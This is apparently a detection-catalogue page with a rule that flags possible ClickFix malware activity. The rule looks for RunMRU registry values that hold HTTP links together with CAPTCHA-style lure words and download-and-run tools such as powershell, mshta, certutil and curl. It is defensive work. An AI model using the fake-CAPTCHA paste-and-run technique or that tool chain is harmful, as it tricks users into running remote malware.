LoFP LoFP / legitimate applications using runmru with http links

Techniques

Sample rules

Potential ClickFix Execution Pattern - Registry

Description

Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links. ClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages. Through the fakecaptcha pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content, such as one-liners that execute remotely hosted malicious files or scripts.

Detection logic

condition: all of selection_*
selection_details:
  Details|contains:
  - http://
  - https://
selection_registry:
  TargetObject|contains: \SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\
selection_susp_pattern:
- Details|contains:
  - account
  - anti-bot
  - botcheck
  - captcha
  - challenge
  - confirmation
  - fraud
  - human
  - identificator
  - identity
  - robot
  - validation
  - verification
  - verify
- Details|contains:
  - '%comspec%'
  - bitsadmin
  - certutil
  - cmd
  - cscript
  - curl
  - mshta
  - powershell
  - pwsh
  - regsvr32
  - rundll32
  - schtasks
  - wget
  - wscript